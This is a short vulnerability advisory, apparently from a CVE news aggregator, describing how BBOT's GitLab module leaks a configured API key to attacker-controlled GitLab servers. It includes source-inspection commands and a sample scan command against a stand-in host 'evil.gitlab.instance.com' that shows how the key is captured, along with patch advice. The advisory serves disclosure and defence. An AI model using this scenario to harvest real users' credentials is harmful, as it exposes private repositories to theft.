GitLab, API Key Exposure, CVE-2025-22092 (Moderate)

Listen to this Post

The vulnerability in BBOT’s `gitlab.py` module occurs due to insecure handling of globally configured API keys during web scans. When BBOT is configured with a “gitlab” API key for interacting with gitlab.com, this credential is not properly scoped and is inadvertently included in HTTP requests made to other GitLab instances. Specifically, if a user scans a malicious or untrustworthy server that hosts a GitLab instance, the `gitlab.py` module automatically attaches the globally configured API key in the `Authorization` header of the requests sent to that server’s endpoint. This happens because the code uses the same “gitlab” API key configuration for all GitLab-related communications, regardless of the target domain, leading to a credential leak where the key is exposed to the attacker-controlled server.
Platform: BBOT
Version: Pre-1.1.2
Vulnerability: API Key Leak
Severity: Moderate
date: 2025-10-09

Prediction: Patch by 2025-11-06

What Undercode Say:

git clone https://github.com/blacklanternsecurity/bbot
cd bbot
grep -r "gitlab" --include=".py"
cat bbot/modules/gitlab.py
In gitlab.py, look for the header construction:
headers = {'Authorization': f'Bearer {self.api_key}'}
The API key is self.config.get('gitlab', 'api_key', '')

How Exploit:

An attacker sets up a malicious GitLab instance. They then trick a target user into scanning this instance with BBOT, using a command like bbot -t evil.gitlab.instance.com -m gitlab. The target’s configured `gitlab.com` API key is sent to the attacker’s server in the HTTP `Authorization` header, which the attacker logs.

Protection from this CVE:

Update BBOT to version 1.1.2 or later, which restricts the API key usage to its intended target (gitlab.com). Do not use a global “gitlab” API key when scanning untrusted targets. Implement network segmentation and use dedicated API keys for different environments.

Impact:

Unauthorized disclosure of the GitLab API key, potentially allowing an attacker to access the user’s private repositories, issues, and other GitLab resources, leading to a compromise of proprietary code and project data.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top